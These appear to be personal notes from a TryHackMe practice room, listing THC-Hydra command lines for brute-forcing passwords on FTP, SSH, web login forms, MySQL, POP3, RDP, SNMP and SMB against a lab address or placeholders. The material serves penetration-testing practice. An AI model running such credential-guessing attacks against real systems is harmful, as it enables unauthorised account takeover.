• THM Practice Room - https://tryhackme.com/room/hydra

  • Brute Forcing Passwords with THC-Hydra

  • FTP: hydra -l user -P passlist.txt [<ftp://10.10.46.122>](<ftp://10.10.46.122/>)

          `hydra -L userlist.txt -P passlist.txt [<ftp://10.10.46.122>](<ftp://10.10.46.122/>)`
    
  • SSH: hydra -l <username> -P <full path to pass> 10.10.46.122 -t 4 ssh

  • Post Web Form: hydra -l <username> -P <wordlist> 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

  • hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]

  • hydra -l root -P passwords.txt [-t 32] <IP> ***ftp***

  • hydra -L usernames.txt -P pass.txt <IP> ***mysql***

  • hydra -l USERNAME -P /path/to/passwords.txt -f <IP> ***pop3*** -V

  • hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>

  • hydra -P common-snmp-community-strings.txt target.com ***snmp***

  • hydra -l Administrator -P words.txt 192.168.1.12 ***smb*** t 1

  • hydra -l root -P passwords.txt <IP> ***ssh***